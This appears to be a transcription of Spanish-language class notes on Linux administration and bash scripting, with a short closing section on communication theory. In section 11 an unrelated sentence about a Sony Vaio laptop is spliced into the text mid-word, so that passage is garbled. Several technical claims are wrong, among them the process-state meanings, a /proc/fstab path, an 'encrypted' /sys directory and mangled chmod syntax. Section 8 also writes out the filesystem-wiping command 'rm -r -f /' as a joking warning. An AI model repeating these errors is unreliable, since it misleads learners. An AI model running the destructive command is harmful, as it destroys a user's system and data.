Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado.

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado."

Transcripción

1 LINUX no es un s.o. Es el NÚCLEO. Nomenclatura: a.b.c.-d a : versión b:cuando el numero es par el núcleo es estable. Indica distribución. C: es modificación de la distribución. El s.o es GNU-Linux (gnu is not unix). MODIFICAR SISTEMA DE ARRANQUE. 1- Eleccion de S.O en el arranque. Grub 1.0 (ediciones anteriores de linux de 2009) /boot/grub/menu.lst para editarlo necesitas ser Root.. Grub 2.0 (versiones actuales de linux) /boot/grub/grub.cfg se puede editar a mano pero no conviene. Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado. Archivo : /etc/default/grub Con superusuario abrimos el archivo: sudo gedti /etc/default/grub Cambiar la linea GRUB DEFAULT= x. Esto es para seleccionar el numero de S.O. A la hora de arranque. Si se pone SAVE, carga directamente el anterior s.o que se ejecuto. También se puede poner el nombre de la entrada (menuentry). Ejecutar sudo update-grub, (en suse y mandriva es update-grub2), 2-Consola linux. Cp origen destino copiar mkdir hacer carpeta comando --help ayuda directa de comando man comando ayuda fuerte. Q para salir info comando otro entorno de ayuda. Exit cerrar consola clear limpiar pantalla

2 Estructura de computadora: Este esquema esta optimizado para linux. En win, el núcleo se compone del kernel, la capa de abstracción y el shell. Tipos de enlaces: Links: enlaces llamados lanzadores, que son los accesos directos a las carpetas de windows. Softlinks: son los accesos directos a los programas. Hardlinks: son copias reales del archivo al que enlazan. Comprensión de archivos: Suelen estar comprimidas las cosas. Al descomprimir te lo guarda en /HOME/user_name. Normalmente esta comprimido varias veces con extensiones.tar.gz o.tar.bz. CARPETAS EN CUALQUIER DISTRIBUCIÓN LINUX. /home/user_name : Mis documentos en windows. Dentro de esta carpeta existe una llamada o Escritorio o Desktop. Carpetas de programas: /bin nucleo de ejecutables para todos los usuarios. /usr/bin /usr/local/bin en esta carpeta se guardan los programas de compilación propia. /usr/share Carpeta donde se guardan carpetas para compartir con otros usuarios, tanto a nivel local como en red.

3 Carpeta donde los sistemas linux montan los dispositivos: /mnt : antiguamente, pero se guarda por compatibilidad. /media : actualmente se montan en esta carpeta /cdrom : monta el CD-ROM /dvd : monta el DVD. /dev se guardan los dispositivos del hardware, se guardan las configuraciones de los dispositivos. / Llamada raíz. Cualquier ruta siempre empieza con el símbolo de raíz. Es donde empieza todo. /root es la cuenta de superusuario. /proc información guardada para poder visualizar le sistema de archivos, del montaje y desmontaje del sistema de fichero. /proc/fstab tabla del sistema de archivos que carga cuando el sistema arranca. /sbin se creo para distinguir los ejecutables del sistema y de programas. Actualmente en /sbin guarda los ejecutables del sistema. /srv guarda información sobre servicios que instale el usuario, no los del sistema. /sys información encriptada, y es la imagen que tiene el Kernel de los dispositivos. /tmp guarda los archivos temporales que se utilizan mientras funciona un programa, un ejecutable, un archivo, y al apagar el sistema se vacía. /var se guardan los sistemas de intercambio, los bufferes de memoria. Pero existen subcarpetas con configuración de servicios del sistema, así como controladores de servidores web. /boot imágenes de arranque y las invocaciones de INIT. /boot/grub gestor de arranque con Grub. Se puede modificar, leyendo la documentación se modifica fácilmente. /boot/lilo gestor de arranque con Lilo /etc están,generalmente, las configuraciones de los programas y de los servicios. /lib se guardan las librerías compartidas /lost+found cuando al guardar algo se guarda mal, se puede encontrar aquí el documento con información. /opt se guardan paquetes de programas que guardan opciones modificadas de programas. REPOSITORIOS: Main donde están todos los paquetes soportados y comprobados por la distribución. Restricted programas comprobados por la distribución pero que no son de licencia pública. Ejem. Controlador de la tarjeta gráfica. Universe gratuitos, de la comunidad, pero que no estan soportados ni comprobados por la distribución. Multiverse son los no soportados por la distribución y que no son de licencia pública. Ejem. Los codecs de audio. SYNAPTIC : es un entorno gráfico (GUI) para un programa llamado APT. APT : /etc/apt/sources.list se puede modificar con superusuario, y es una lista de fuentes para descarga de programas. Los nombres de los archivos para descargar suelen ser DEB.XXXXX o RPM.XXXXX. Además, podemos descargar el codigo fuente, que se llama DES-SRC.XXXXX. Con apt-get se invoca desde la consola al APT. Para instalar : apt-get install nombre_del_paquete Para forzar instalar las dependencias del programa: apt-get install -f nombre_del_paquete Para desinstalar : apt-get remove nombre_del_paquete. NO borra el paquete del equipo, lo deja

4 en el equipo. Para borrar del todo: apt-get purge nombre_del_paquete. Apt-get update actualiza la lista de los componentes que tienes en el equipo. Es conveniente, después de un purge, por si acaso. Apt-get upgrade instala las actualizaciones. Es como usar el gestor de actualizaciones. Apt-get autoremove apt-cache invoca a la base de datos de APT. Apt-cache search expresion busca esa expresion en la bb.dd. Shotdown -h now apaga el sistema, detiene todos los servicios.. Less paginador por defecto. Que se encarga de paginar la salida de la consola. Para usarlo se pone comando less aptitude tiene menos funciones que apt, pero tiene la ventaja que se permite ejecutar desde una consola remota. Sirve para instalar programas. Con la opción -g, si el programa no esta instalado, lo instala. Opcion -q opcion / opcion n INSTALAR TIPOLOGIAS DE LETRAS. APT-GET INSTALL MSTTCOREFONTS FC-CACHE -FV RECARGA LA BASE DE DATOS DE FUENTES SIN NECESIDAD DE REINICIAR. Las fuentes quedan en /usr/share/fonts COMANDOS PS muestra los procesos del sistema. En linux no se denominan procesos, sino demonios (demon) Ps ax A muestra los procesos de todos los usuarios. X muestra los procesos que no estén vinculados a ninguna terminal. Ps -f muestra las dependencias padre-hijo. Ps -u nombre_user muestra los procesos de ese usuario. Ps -A muestra todos los procesos que tenga el sistema noticia de ellos. Ps -forest hace como pstree. Si a ps +modificador le añades -ef saca mas información. PID Identificador del proceso TTY Terminal que esta ejecutando el proceso. STAT Estado del proceso. Si ha estado o no en marcha. La letras nos dan una pista sobre le proceso. : S : sleep R : ejecución.(run) D : acabado (death) y no puede ser rearrancado. O que hizo su cometido y acabo. Z : Zombie. Se ejecuto, algo salio mal y no se pudo descargar de la memoria. T : detenido pero se puede arrancar. X (version de z): acabo el proceso pero por mal funcionamiento no se darcargo de la ram. I : dormido como s (menos de 20 seg) ojo según distro puede ser al reves. P : esperando para swap <> prioridad mayor o menor.

5 Swap nucleo w n TIME Tiempo en el que se ejecuto desde el inicio del equipo. COMAND Desde donde se ejecuta. El demonio init, es el principal y mas importante. Es lo primero que se lanza al cargar el S.O y es el que llama a los demás procesos. El ejecutable de este proceso esta grabado en /sbin/init, y tiene los parámetros de iniciación guardados en una tabla que se encuentra en /etc/inittab. Los niveles de ejecución (runlevels), del 0 al 6, en casi todas las distribuciones los niveles del 2 al 5 son iguales. Ubuntu usa como standar el nivel 2, mandriva nokis y alguna otra utilizan el nivel 5. Estan escritos en unos archivos en {rc0.d, rc1,d, rc2.d, rc3.d, rc4.d, rc5.d, rc6.d} en estas carpetas lo que hay son enlaces simbolicos.la estructura de estos enlaces es S<numero>nombre_servicio. S28Network_mon : se ejecuta en el nivel 2, es el demonio que monitoriza el entorno de red. Comando de consola: init numero_runlevel cambia de nivel de ejecución. Init 6 reinicia el equipo. Init 0 apaga el equipo. Init 1 modo de recuperación del sistema. Carpeta llamada /etc/init,d, donde estan todos los scripts de iniciacion y detencción para todos los servicios del sistema. Lo que tiene dentro es archivos con el nombre del servicio, y lo que se puede hacer es arrancarlos, pararlos, reiniciarlos. En la consola se puede poner /etc/init.d nombre_servicio {start, stop, rstart, reload,status}. Los comand cuyo nombre aparece entre corchetes son del sistema. Luego estan los procesos GETTY. Son los que estan asociados a las terminales. Syslogd : este demonio es el que registra los eventos del sistema. Klogd : este demonio es el que registra los eventos del kernel. Los log se guardan en la carpeta: /var/log. El log del nucle es el kern.log y el otro sys.log o messages. Avahi tiene dos procesos, uno del núcleo y otro del sistema, que se encargan de controlar las comunicaciones. D-bus demonio que establece un canal de comunicación interno, por el que se comunican los programas entre ellos. Esta asociado a HAL( Hardware abtraction layer), que es una capa que permite entender por parte del software el hardware. Cups Common Unix Printer System. Es el demonio preparado para imprimir. Comunicaciones inalámbricas: bluetoothd controla los dispositivos bluetooth. wpa-supplicant controla la comunicación wpa. Nm-system-settings controla el gestor de redes inhalambricas. ALSA Advanced Linux Sound Architecture. El programa que maneja este controlador se llama pulseaudio. GFVS demonio muy importante en todos los linux sobre los del escritorio Gnome. Gnome File Virtual System. Es el controlador de los sistemas de ficheros virtuales. Carpeta llamada /etc/init,d, donde estan todos los scripts de iniciacion para todos los servicios del sistema.

6 dmesg informa de las cosas que han ocurrido en un dispositivo desde que se inicio la sesión. Como hay muchos, ponemos filtro: dmesg grep etch0. Con el modificador -i muestra todos los mensajes seleccionados sin contar que este escrito en mayúsculas o minúsculas. Pstree muestra los procesos en forma de árbol. Sirve para saber que si paras un proceso, sabes que procesos cuelgan de el. Con -p muestra los identificadores de los procesos. Kill sirve para cargarse un proceso. Se utiliza como: kill -nº PID el -nº es un numero del 0 al 15. El -15 es como no poner nada, preguntando. El -9 apaga directamente el proceso eliminándolo de la RAM. Grep es un comando que se utiliza con otros comandos para que filtre la información. Ejem. Ps ax grep -i synaptic : la salida del ps donde el nombre del proceso contenga synaptic. TOP es igual que PS pero a tiempo real. TERMINAL: Para abrir una termnal CNTRL + ALT + F2. Para cada terminal un Fx distinto desde F1 hasta F6. Para cerrar una sesión de terminal CNTRL + D Para cerrar el terminal CNTRL + ALT + F7 Programas GSTREAM(ER) Paquete de codecs. D4X gestor de descargas pero de código libre, como JDownload. Amarok reproductor de audio. VLC mejor reproductor de audio. InDesign programa de maquetación. Dia programa para hacer diagramas. Amsn : messenger. Inkscape : programa de dibujo vectorial profesional. Bluefish : editor de paginas web como Dreamweaver. Audacity : editor musical. WINE : Permite ejecutar ejecutables de win sobre linux. Pingus: juego como Lemmings. Supertuxkart: juego como mariokarts. Intalar paquetes en debian (DEVejecutables) apt -get install no download nombrepaq.deb XXXXXXX.TAR.GZ DERECHOS DE ESCRITURA TAR -ZXV :NOMBRE PAG.TAR.GZ DESCOMPRIME EL PAQUETE.tar.bz2(nombre archivo) tar -jxvf CD NOMBRE PAQUETE -BUSCAR PAQUETE NANO README LEER,/CONFIGURE MAKE establece la configuraciones make install

7 dpkg install paquete.deb unpack desempaquetar configure info - informacion de paquete status - mas informacion avisa si esta instalado remove - borra la instalación del programa pero no la configuracion purge - borra todo hostname whoami id ufd identificador de usuario gid identificador de gname date (fecha) man date(todo) time is who usuario del equipo rwho -a todos los usuarios que se han conectado al servidor. Finger (nombre_usu) información sobre el usuario que eres last: muestra el historial de las últimos usuarios del sistema history more lista de comando que has utilizado killall nombre de programa uname -a : muestra información general del sistema. Free : memoria libre y consumida. Estado de la memoria. Parámetros {-m, -g, -b,- k) para que me de la información en la unidad de medidas que queremos. -T nos da los números totales. Df : espacio libre en discos duros. df -h :nos muestra la información legible para los humanos. df -h /dev/sda : particiones. Du -h nom_archi: nos muestra la información de un archivo. Swapon -s : muestra información de la paginación swap. Fdisk : programa que sirve para hacer particiones. Fdisk -l : lista la tabla de particiones. Lsmod : lista los módulos del kernel, lo que serian los controladores del mundo windows. Lspci : información sobre el hardware. -v : muestra mas información -vv : mas información -nn : nos da los números y los nombres de los dispositivos de hardware. -k : nos da los módulos asociados del núcleo. La información sobre todo esto se encuentra en /proc, es donde se monta el sistema de ficheros virtual del kernel. Existe un montón de ficheros de texto, que si se modifican puede suponer un problema. cat ruta_archivo : nos muestra el contenido de un archivo. Cat /proc/.cpuinfo : información sobre el chipset de la placa base. Cat /proc/.versión : versión del kernel de linux cat /proc/interrupts: muestra las interrupciones. Cat /proc/filesystems : información sobre los distintos sistemas de ficheros soportados por en núcleo. Cat /proc/printcap : configuración del sistema de impresión.

8 Ls : listar el contenido de el directorio seleccionado. -aux : conbinaccion de varias. Muestra los archivos de todos los usuarios. -a : muestra los archivos ocultos -la : muestra los permisos y propietarios incluso de los archivos ocultos. -f : muestra el contenido de los directorios. -i : muestra los i-nodos (especie de direcciones donde apuntan los dispositivos o donde apuntan los archivos al kernel) -m :muestra los directorios separados por coma. -r : muestra las cosas del revés. -s : muestra el tamaño de los objetos -t : los ordena por fechas, generalmente la de creación. -R : hace un listado recursivo, mostrando los subdirectorios. -l : muestra los permisos y propietario. Mkdir : crea un directorio. -p : con esta opción podemos crear arboles enteros. Es decir no tenemos que ir creando carpeta a carpeta, sino poner la ruta directamente y crea todas las carpetas. -m xxx: asigna permisos al directorio creado. Donde x es el tipo de permiso. Rmdir : borra directorios, siempre y cuando el directorio esta vacío -p : borra el árbol entero. Touch XXXX: crea un archivo vacío con el nombre dado. Cp origen destino: copia un archivo en otro. -p : copia el archivo tal cual, con permisos y su sistema de fechas. -r : copia los subdirectorios. -i : pregunta si quieres sobreescribir o copiar. Mv origen destino: mover archivos. -i : pregunta si quieres sobreescribir o copiar. Rm : borra archivos y directorios, sin preguntar salvo que sean archivos del sistema -i: pregunta si quieres realmente borrar. -f : fuerza el borrado aunque sean archivos del sistema. -r: se carga los directorios existentes -v : informa de lo que va haciendo. Rm -r -f / borras el sistema completo de archivos. La has jodido. Permisos: Ugo User Group Other. Es el sistema de permisos. Chmod : es el que permite cambiar permisos a archivos. g+rw : añade algrupo lectura y escritura g-rw : qita al grupo lectura y escritura. Chmod u{+-}rwx, g{+-}rwx, o{+-}rwx archivo generalmente se escribe así. Chmod ugo +--w ---x +---x archivo seria otra manera de ejecutar este comando. Chmod ugo=rwx archivo otorga permisos de todo a todos. En sistema octal tambien se puede ejecutar chmod: x -w- -wx r-- R-x rw- rwx chmod num_user num_gruop num_other archivo chmod 777 archivo Una utilización normal es con 755, es que tu puedes hacer lo que quieras y los demás leerlo y ejecutarlo.

9 Se suele utilizar un numero delante de los permisos. Ejem: Esto lo que hace es pemitir ejecutar un archivo como si fueses otro usuario. Es un bit llamado S, y permitiria, dependiendo del valor: 4 todo el mundo puedo ejecutarlo con los permisos del creador. (U) 2 puede ejecutarlo con los permisos del grupo del creador (G) 1 se usa en los directorios para 'distinguir' usuarios. Chgrp nom_grupo archivo : sirve para cambiar el grupo. Groups me da un listado con los grupos del sistema. archivo dice a que grupos pertenece ese archivo. Chown : permite cambiar de dueño el archivo. Chown -R pepito /home/pepito le asignas carpeta personal al usuario. Mount -o loop nom_img_disk /ruta/directorio/ Comando para montar una imagen de un disco para poder andar por dentro de los archivos de esa imagen. Importante barra de final de ruta. Mount /media/cdrom monta el cd-rom mount /media/dvd monta el dvd mount /media/usb monta el usb umount + ruta desmonta lo que tengas montado en la ruta especificada. Netstat -putan greep nom_prog : nos muestra el estado de unprograma que esta arrrancado desde la tarjeta de red. -w : muestra quien y que esta haciendo. Comando > archivo : carga el resultado del comando en el fichero. Comando > archivo.txt : carga el resultado del comando en el fichero en windows. Comando >> archivo : si existe el fichero, lo conserva y añade el resultado al final. Sync : sincroniza passwd usuario: cambiar la contraseña a un usuario. Gpasswd -M usuario grupo : añadir un usuario a un grupo. -A usuario grupo: es el administrador del grupo. Lsof :saber las cosas que hay en ejecución y lo que esta pillado. Lsof greep /dev/{hda1, cdrom, dvd } : sabe que proceso ha dejado pillado el disco duro, el cdrom o el dvd. Sata sda scsi sdb usb sdc cat : empalmar archivos y leer, es como el edit de windows. Cat arch.txt arch2.txt Head -3 archivo : muestra las 3 primeras lineas del archivo. Tail -5 archivo: muestra las 5 ultimas lineas del archivo. Mount -t sis_de_fichero {NTFS, VFAT, EXT3, RAISER...} dispositivo[/desv/algo] pto_montaje[/mnt/algo, /media/algo...] -V : versión de mount -h : ayuda

10 -v :informa de todo lo que va haciendo -a :monta todo lo que hay en fstab(tabla de sistemas de archivos). -f : no hace nada. -n :montaje temporal que no escribe nada en la tabla fstab -s : permite algunos errores en el montaje -r: -o ro: monta el sisema de ficheros solo lectura -w: -o rw: monta el sistema de ficheros en solo escritra. -t : tipo de sistema de fichero. Hay que decirselo para que no lo monte en CD. MOUNT -T AUTO. -A -T NOMSOLO,EXT : monta todo lo de fstab menos los que sean nomsolo y ext. Fstab : /etc/fstab : se puede leer con cualquier editor de texto, no se puede modificar si no eres root. <file system> <mount point> <type> <options> <dum> <pass> /dev/sda1 /windows ntfs 0 0 /dev/sda5 / ext4 relatime, errors = remount-rce 0 0 /dev/sda6 none swap sw 0 0 /dev/scd /media/cdrom udf iso9660 user, noauto,exec,utf8 0 0 /dev/fd0 /media/floppy0 auto rw, user, noauto, exec, utf auto : particion se monta al iniciar el sistema. -noauto: particion no se monta al iniciar el sistema. -user : permita a los usuarios montar la particion. -nouser: solo root puede montar la particion. -ro : solo lectura -rw : lectura y escritura -exec:se permite ejecutar programas -async : el sistema sigue trabajando tras una petición de escritura. -Default: equivale a poner rw, exec, auto, nouser, async. Grabar cd: -whereis cdrecord : instrucción para saber si tenemos este programa para grabar cd. 1- comprobar si hay grabadora: whodim scanbus POR SI NO VA. Wodim - -devices -scanbus 2- Crear la imagen ISO MKISOFS -R -V -J- O /TMP/IMAGEN.ISO /DIRECTORIO_ORIGEN -r: todos los permisos de lectura y ejecución uid guid toda a 0 -v:verbase, te da información de todo lo que hace cuando se ejecuta. -J:extensión que permite nombre de mas de 8 letras -o: selecciona el directorio de salida. 3- Grabar cdrecord -eject -v dev=0,0,0 /temp/imagen.iso

11 GRABAR IMAGEN ISO. Crear una imagen ISO Para crear una imagen de los datos que queremos grabar, utilizamos mkisofs: mkisofs -r -o imagen.iso directorio Con la opción -r generaremos un sistema de archivos con extensión Rock Ridge. Quemar la imagen ISO Para quemar el CD/DVD usamos wodim, primero detectamos la grabadora: $ wodim --devices wodim: Overview of accessible drives (1 found) : dev='/dev/scd0' rwrw-- : 'TSSTcorp' 'DVD+-RW TS-L632D' Ya podemos empezar a grabar: wodim -v -eject dev=/dev/scd0 imagen.iso En mi caso la grabadora es /dev/scd0 shell script: Existen varios tipos de consolas en Linux. La mas recomendada es BASH, y es de software totalmente libre. La extension mas utilizada para los script en Linux son.sh, aunque no es necesario la extensión, se ejecutan igual tengan o no tenyo uso una computadora portátil Sony Vaio VGN-FE890 ejecuta kernel de Linux gan extensión. Todos los script del sistema acaban en.sh. La primera es la unica linea obligatoria en todos los script: #!/bin/bash hace la llamada a la consola, y tiene que empezar asi todos los script. Cualquier linea que empiece por # es un comentario. Ejem: #!/bin/bash #hola ls #adios Los script se pueden guardar en cualquier carpeta, pero con permisos de escritura. Hay que dar permisos al fichero, para ello usamos el comando CHMOD (véase mas arriba). Si se guardan en una carpeta que el sistema reconozca como carpeta para ejecutables, desde la consola se pueden invocar directamente. Para saber las carpetas para ejecutables se usa el comando echo $PATH. Echo: muestra en pantalla un texto seleccionado. Ejem: echo hola, muestra hola. Si lo pones entre comillas lo pone como texto, sino lo intenta ejecutar. -e texto: permite usar el carácter de escape (\) que hace que lo que vaya detras sea una ejecución especial. Ejem: /a : sonido

12 /b : retrocede un carácter /n : salto de linea /t : tabulación horizontal /v : tabulación vertical \ : escribe comillas. Si se pone con un símbolo, se escribe el símbolo que vaya detrás. Read: lee lo que nosotros introducimos. -p : fuerzas la espera del parametro. -p texto: te escribe el texto seleccionado y espera que metas un valor. Variable = lo que sea : se le asigna a esa variable el valor que le pasemos. Para mover de variable a variable se tiene que poner variable1 = $variable2. Echo, read, $+num, no se puede utilizar como variable. Algunas variables establecidas internamente por el shell y que están disponibles para el usuario: $1 - $9 parámetros posicionales $0 nombre del comando actual $# número de parámetros posicionales $? exit status del último comando ejecutado dado como un string decimal. Si todo ha ido bien se retorna cero. $$ el numero de proceso de este shell, útil para incluirlo en nombres de ficheros para hacerlos únicos. $! la pid del último comando ejecutado en background. $- las opciones actuales suministradas para esta invocación del shell. $* un string que contiene todos los argumentos del shell comenzando por el $1. igual que el anterior, excepto cuando va entrecomillado. Matrices (arrays). Puede almacenar numero texto o incluso otras matrices. nom_matriz[nº] = valor El primer valor de una matriz es el 0. Las arrays de los script funcionan de la misma forma que los arrays de cualquier lenguaje de programación. Una array es un conjunto o agrupación de valores cuyo acceso se realiza por índices, en un script se puede almacenar en un mismo array todo tipo de cosas, números, cadenas, caracteres, etc. En las arrays el primer elemento que se almacena lo hace en la posición 0 ( en el ejemplo seria Paco ). En los script no hace falta declarar el tamaño de la array, puedes insertar tantos valores como desees. Para declarar una array es: declare -a nombre_array declare -a nombres La opción -a sirve para decir que lo que vas a declarar es una array. Para darle valores se puede hacer de dos formas: 1. Darle valores posición por posición. nombre_array[posicion]=valor nombres[3]=manolo

13 2.Darle todos los valores de golpe ( aunque también se puede decir la posición deseada en la que quieres guardar uno de los valores ). nombre_array=( valor1 valor2 valor3 [posicion]=valor4... valorn ) nombres=( Maria Alberto Rodrigo [7]=Paco ) Para ver el contenido de la array en una posición: ${nombre_array[posicion]} ${nombres[0]} Para saber cuantos elementos contiene la array: ${#nombre_array[*]} ${#nombres[*]} Bucle: #!/bin/bash #bucle chachi r=0 for i in $(ls /home) do usuarios[$r] = $i r = $r +1 done echo ${usuarios[1]} Metacarácteres: *? [] ho[lj]a (hola) \ escribir ciertos caracteres. Echo \* $ se usa para poner delante del nombre de una variable para hacer invocación a los comandos de la consola. para cadenas de texto echo \ para escribir comillas ~ hace referencia a /home/user, carpeta raíz del usuario. Operaciones: + suma - resta * multiplicación / división % módulo. Nos da el resto de la operación. Los símbolos * / % tienen preferencia sobre el símbolo + -, salvo que existan paréntesis. Estructuras lógicas: if else si sino if [condición] then instrucciones que se ejecutan si la condición es cierta elif[condición] instrucciones que se ejecutan si la condición del primer if es falsa y la de el elif es cierta else instrucción que se ejecuta si las condiciones anteriores son falsas.

14 Fi Estructura CASE: CASE valor IN patron ) instrucciones ;; patrón 2) instrucciones ;; *) instrucciones ;; esac. Condiciones lógicas:!expresion? estoy preguntando si es cierta la expresión. Responde TRUE o FALSE. Expr1 -a exp2? es el and o Y lógica. Para que sea cierto tienen que ser iguales. Expr1 -o exp2? es el or o O lógico. Numeros: Int1 -eq int2? esto se cumple si son iguales. Int1 -gt int? mayor que int1 -lt int? menor que int1 -ge int? mayor o igual int1 -le int? menor o igual STRINGS: -z cadena? cierto si la cadena esta vacía cad1 = cad2 esta preguntando si las cadenas son iguales cad1!= cad2 esta preguntando si las cadenas son distintas. cadena? cierto si la cadena no es nula. Archivos: -d archivo? existe y es directorio. -e archivo? tiene que existir. -r archivo? tiene que existir y tener permisos lectura. -w archivo? tiene que existir y tener permisos de escritura. -x archivo? tiene que existir y tener permisos de ejecución break interrumpe la ejecución de las sentencias condicionales. Funciones: function nom_funcion(par1 par2.) { comandos } Invocar funciones nom_función(par1 par2...) realiza la llamada. Var = nom_función si da un resultado, se le asigna una variable. La función tiene que

15 tener un return nom_resultado. Paquetes para visualizar cosas en shell script: GNOME ZENITY saca ventanas para seleccionar cosas. KDE KDIALOG saca ventanas para seleccionar cosas. Comandos: var = zenity/kdialog opcion[par] --calendar muestra un calendario para seleccionar fecha --file-selection para seleccionar archivos en modo gráfico. --notification ventana para enviar mensaje --list muestra una lista para elegir algún elemento de la lista --progress muestra una barra de proceso. --entry muestra un campo de texto para introducir valores. --text-info similar a notification, solo que aquí sale unicamente un texto --warning muestra advertencias --error muestra mensajes de error --info mensajes informativos --question muestra una pregunta. Exite el campo TITLE: VAR = zenity - -entry title='xxxxx' Es el titulo que le quieres dar a la ventana que aparecera > Comando para configurar la tarjeta de red: ifconfig iwconfig permite configurar tarjetas de red inalámbricas. Como poner a funcionar una tarjeta de red inalámbrica mediante controladores de windows. Ndiswrapper es conveniente tener instaladas las wireless-tools. Instalar en ordenador. ejecutar: ndiswrapper -i ruta (la ruta es donde se encuentran los controladores de la tarjeta ndiswrapper : una vez acabado el anterior, ejecutamos esto. Y contestara: net. present. modprobe ndiswrapper: fuerza a que le nucleo de linux use esa tarjeta. Esto no es permamenente, cuando se reinicie el equipo, se tiene que ejecutar este comando. Dmesq grep wlan : comprobamos que realmente esta usando la tarjeta de red que instalamos. La respueste debe de ser WLAN0:ndiswrapper > Cuando se configura una red puede convenir añadir los DNS. Desde la consola los comandos no añaden los DNS. Los archivos están en /etc/resolv.conf, se puede escribir a pelo las ip de la DNS al final. O escribir desde la consola: echo IP..ip >> /etc/resolv.conf IFCONFIG Comando de configuración de red de linux. Es similar a ipconfig, salvo que este no solo muestra información, tambien puedes hacer cosas. -a : muestra información de los dispositivos de red. Las tarjetas de red cableadas normalmente eth0, y las inalámbricas wlan0, aunque tambien se puede encontrar wifi0. ifconfig nom_interfaz [direccion [parametros]] estructura del comando IFCONFIG. La dirección suele ser una ip directa.

16 Encapsulamiento (link encap), MAC(dirección), direc ip (direc. Inet), difus (broadcast) masc (mascara de red) mtu (unidad máxima de transferencia) Métrica(nº de saltos para llegar a otro nodo) -up : pone a funcionar el dispositivo de red. -down : apaga el dispositivo de red. -netmask mascara : poner la mascara de red a tu tarjeta de red. -broadcast : muetra la dirección de difusión de nuestra red. -pointopoint : se utiliza para conectar un ordenador a otro. Es una red AD HOC (se comunican equpos entre ellos). -irq : establece lineas irq (antiguo canal del chat). -metric : los saltos para llegar a otro modo, suele estar en auto. El demonio RIP, es el encargado de leer la metrica para mandar los paquetes. -mtu : modificar la tasa máxima de transferencia. -arp : es el protocolo de resolución de direcciones (Address Resolution Protocol). Sirve para detectar las MAC de las demás tarjetas. Si esta desactivado en el ifconfig pone noarp. Con arp lo activas con -arp lo desactivas. promisc : algunas veces monitor: es poner la tarjeta de red en modo promiscuo, es decir, que permanece a la escucha. Permite leer todo lo que haya en la red, los paquetes que que van para el y los que no. No todas las tarjetas pueden entrar en modo promiscuo. Para activar el modo promiscuo promisc para desactivarlo -promisc. allmulti : habilita la multidifusión, el multicast de paquetes. Para apagarlo -allmulti IWCONFIG Comando de configuración de red wifi de linux. Multiples opciones. iwconfig[interface [cosas]] : estructura. essid nombre_red : nombre de la red inhalambrica a la que queremos conectacnos. Freq : channel num_canal : en España permitidos del 0-13, aunque existe el 14. mode : impone el modo en el que opera el dispositivo. Los modos son : ad-hoc: modo punto a punto managed : es el modo infraestructura, las redes normales. Modo standar. Master : tu tarjeta es la encargada de dirigir el trafico. Repeater : tu tarjeta actuaria como repetidor de la señal. Monitor : modo promiscuo de la tarjeta de red inalámbricas. auto : lo normar es que se ponga en managed. ap dirmacdelap : nos fuerza a asociarnos con el punto de acceso seleccionado. Key clave: establecer la clave para la red > SCRIPT PARA CONFIGURAR UNA IP FIJA: #!/bin/bash #Para ip fija del ordenador. #modprobe ndiswrapper iwconfig wlan0 mode managed #iwconfig wlan0 key restricted contraseña iwconfig wlan0 essid nom_ap ipconfig wlan0 up IP route add default gu ip-router #contraseña : se pone la de la conexión #nom_ap : punto de acceso

17 #ip : ip que queremos ser #default : nombre del router #ip-router : ip del router > SCRIPT PARA ACTIVAR O DESACTIVAR UNA IP FIJA #!/bin/bash #para activar/desactivar #para ejecutarlo activar_desactivar {anda para } clear case $1? in 'anda') # modprobe ndiswrapper pwconfig wlan0 mode managed # iwconfig wlan0 key contraseña iwconfig wlan0 essid nom_ap ifconfig wlan0 up ip router add default gu ip_router ;; 'para') ifconfig wlan0 down ;; *) echo "Modo de uso: activar_desactivar {anda para}" ;; esac exit Restituir arranque de Linux. Si formateamos la particion de windows, desaparece la opción de arranque de linux, es decir, se borra el grub, al modificar el MBR. Los pasos son los siguientes: arrancar con un LiveCD sudo mkdir /media/ubuntu sudo mount /dev/sd6 /media/ubuntu /dev/sd6 es la particion donde esta instalado el S.O conexión directa entre disco fisico y el sistema de ficheros anterior: sudo mount - -bind /dev /media/ubuntu cambiar el root al nuevo: sudo chroot /media/ubuntu/ Instalar grub: grub -install /dev/sda : /dev/sda tiene que ser el sector de arranque del disco. reiniciar > Teoria de la comunicación. Analogico : Es el sistema que puede tener todos los valores. Digital: es el sistema que solo tiene los extremos. Sistemas de transmisión de datos Serie: tenemos transmision de grupos de bits por el mismo cable. Paraleleo: cada bits se transmite por un cable diferente. (Dibujos en cuaderno)

18 EMISOR > CANAL/MEDIO > RECEPTOR MENSAJE MENSAJE Nombre de las comunicaciones: Simplex :existe un emisor, una linea y un receptor. Semiduplex(Halfduplex): existe un emisor, un receptor y dos lineas no simultaneas. Duplex (fullduplex): existe un emisor, un receptor y una linea bidireccional y simultanea. Ondas: dibujo en cuaderno. Onda electromagnética: es una perturbación del campo electromagnético. Son luz. La velocidad de propagación es una constante, C = 3*10 8 M/s = km/s, y lo que tiene es diferente longitud de onda. Λ = C C = Λf T Ejemplo: Una onda de 100MHz, calcular su frecuencia (cuaderno) El estándar wifi se define para trabajar con ondas cuyas frecuencias están alrededor de 2,4GHz. Longitud de onda 0,125m. La linea de giro de la onda se llama polarización. Ley de Ohm. V=R*I V: Potencial (Voltios) R:Resistencia(Ohmios) I: Intensidad (Amperios) Espectro electromagnético: Es la realción entre amplitud y frecuencia. Decibelio (db) Esquema de transmision. Codificación de caracteres para transmision de datos. ASCII : American Standar Code for Information Interchange (1963). Es un tipo de código de codificación. (CCITT nº 5, son tablas internacionales de comunicaciones). Utilizaba inicialmente 7 bits, actualmente son 8bits. EBCDIC : Extended Binary Code Decimal Interchange Code. Usado por IBM, parecido al ASCII, y con el tiempo ASCII lo absorvio. BAUDOT : CCITT nº2. Red telegráfica conmutada

